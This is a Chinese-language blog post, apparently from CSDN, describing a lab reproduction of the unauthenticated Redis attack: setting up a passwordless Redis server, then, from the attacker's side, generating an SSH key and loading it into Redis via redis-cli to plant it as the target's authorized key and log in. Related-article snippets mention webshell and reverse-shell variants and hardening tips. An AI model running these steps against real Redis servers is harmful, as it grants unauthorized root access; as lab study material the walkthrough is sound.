未授权访问的Redis服务01

最新推荐文章于 2023-10-12 09:06:54 发布
最新推荐文章于 2023-10-12 09:06:54 发布
阅读量251 收藏
点赞数 1
分类专栏: Kail Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Snoopied/article/details/82793850
版权

在服务器上开启Redis服务

wget http://download.redis.io/redis-stable.tar.gz

解压

tar -xvf redis-stable.tar.gz

进入文件夹,编译

make

编译完成之后,修改redis.conf 中的daemonize从no改为yes,允许后台运行,并修改服务监听的地址为服务器IP。

进入src文件夹,使用redis.conf配置来运行服务

./redis-server /usr/redis-stable/redis.conf

查看运行情况

ps aux | grep redis

运行src文件夹中的redis-cli,进入服务,此时未设置密码

且服务器已开启ssh服务

service ssh start
service ssh status

 

攻击方

同样需要下载,解压Redis的文件,进入src文件夹,运行redis-cli尝试登录该服务器

生成RSA密钥文件,默认存放在/root/.ssh/id_rsa,服务器上也需要有此路径才能成功

ssh-keygen -t rsa

将公钥写入到此文件夹的一个空文件中

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n"; ) > fooing.txt

回到Redis的src文件夹中运行redis-cli,将该公钥插入Redis服务器中,设置用户名为foo

cat /root/.ssh/fooing.txt | ./redis-cli -h 192.168.23.128 -x set foo

再尝试登录Redis服务器,发现Redis服务器已经被插入foo账户,接着修改配置文件夹为RSA密钥存放的路径,并设置dbfilename,以此中信息登录

最后以该RSA的私钥登录成功目标主机

 

Snoopied
关注
专栏目录
1.Redis授权访问
weixin_44616172的博客
06-01 368
把 #bind 127.0.0.1前面的注释#号去掉,然后把127.0.0.1改成你允许访问你的redis服务器的ip地址,表示只允许该ip进行访问,这种情况下,我们在启动redis服务器的时候不能再用:redis-server,改为:redis-server path/redis.conf 即在启动的时候指定需要加载的配置文件,其中path/是你上面修改的redis配置文件所在目录,这个方法有一点不太好,我难免有多台机器访问一个redis服务。这里没有密钥文件,我们直接在靶机上创建。
redis_授权访问
scu_hacker博客
01-13 8228
本文介绍redis授权访问的4种利用方式
weblogic授权命令执行(CVE-2020-14882)
qax
11-06 1115
weblogic授权命令执行(CVE-2020-14882) 前言 因为最近太忙了,各种文档之类的乱七八糟的事,对于刚爆的weblogic授权,fofa上找了几个国外的站测了一下,正好今天没什么事,打算写个文章记录一下 0x00 漏洞介绍 经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 0x01影响版本 Oracle Weblogic Server 10.3.6.0.0 Ora...
授权访问服务搭建
公众号shadow sock7
06-04 1910
influxdb安装 参考: https://v2.docs.influxdata.com/v2.0/get-started/ wget https://dl.influxdata.com/influxdb/releases/influxdb_2.0.0-beta.8_linux_amd64.tar.gz tar zxf influxdb_2.0.0-beta.8_linux_amd64.tar....
访问授权验证的 Redis
gb4215287的博客
07-18 1068
server { location /test { content_by_lua_block { local redis = require "resty.redis" local red = redis:new() red:set_timeout(1000) -- 1 sec
CAS单点登录报错:认证授权服务
大强博客
07-06 8597
错误信息: 认证授权服务 CAS的服务记录是空的,没有定义服务。 希望通过CAS进行认证的应用程序必须在服务记录中明确定义。 解决办法: 。。。 ...
Redis权限和访问控制
最新发布
wgq2020的博客
10-12 379
其中,default_username和default_password是默认用户名和密码,on表示启用认证机制,nopass表示不需要密码,~*表示允许读取所有key,+@all表示允许执行所有命令,-@dangerous表示禁止执行危险命令。Redis提供了一套完整的权限管理和访问控制机制,可以控制用户的访问权限和操作权限,保障数据的安全性。表示创建一个用户名为alice,没有密码的用户,并且允许用户访问所有的key,但是拒绝用户执行所有的命令。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问
xuanlanxiao的博客
05-10 483
攻击者在授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。可以简单看一下这些,原因很简单,因为centos7自身存在防火墙,会将redis默认端口6379隐藏,不允许外界访问,所以这里kali访问失败,我们关掉centos7的防火墙再试一试。自己搭建的靶场可以拉拽redis压缩包进入虚拟机里。
配置Redis(远程访问授权设置)
rocklee的专栏
06-29 1万+
    如果想要Redis能远程可以访问, 那么需要将redis.conf里面的bind 127.0.0.1这一行注释掉, 还有,找到protected-mode这行, 将yes改为no.保存后,重新启动redis-server.    先看看redis-server监听的端口情况 :[root@centos7 redis]# lsof -i|grep redisredis-ser 6982   ...
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2550
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5737
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
【漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 1151
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
Redis安装过后在服务中无显示的问题
qq_38661184的博客
01-30 3741
Redis添加到服务 下载了Redis(通常是安装包)安装完成之后,需要在【服务】中打开,但是有时找不到,这时需要进行如下操作: 首先需要在命令行(Win+R)中输入cmd(要以管理员的身份运行),打开后命令行界面后使用cd 切换到redis目录,输入redis-server.exe redis.windows.conf运行redisredis服务启动后(这个命令行界面不能关),重新打开一个命令行界面,然后输入语句:redis-server.exe --service-install redis.
mysqld:被识别的服务(解决方法)
热门推荐
it琦 的博客
12-21 5万+
解决centos中 "mysqld 被识别的服务" 错误
Redis默认空口令授权访问
well_done_的博客
12-02 3048
前几天接到总部的电话说是要我配合他们信息安全部门调查一下我们这边一台中了挖矿病毒的主机,总部大佬远程过来一顿操作发现是通过redis进来的,redis因为默认设置是没有密码的,如果主机是用root身份运行的redis,就可以直接写入ssh密钥来登录到主机。大佬操作完之后,我模拟了一下环境,和大家分享一下攻击过程。 一、测试环境 测试对象 IP 靶机(centos7) 19...
linux下redis安装、启动与停止,redis做成服务
你是我的天晴
08-31 4万+
如果的linux可以链接网络,那么可以直接联网下载。直接输入代码:wget http://download.redis.io/releases/redis-3.0.2.tar.gztar zxvf redis-3.0.2.tar.gz 我们会看到在该目录下多了一个文件,redis-3.0.2 ,我们进入该目录,然后编译执行命令make,等待10左右,我们就会看到已经编译完了,我们看到如下界面,说明...
Redis授权访问与SSH key利用分析
3. 使用防火墙规则:限制只有可信IP可以访问Redis服务。 4. 更新及监控:定期更新Redis版本,修复已知漏洞,并通过日志监控异常行为。 5. 安全配置SSH:限制SSH的公钥认证,只允许特定公钥登录,并设置严格的权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值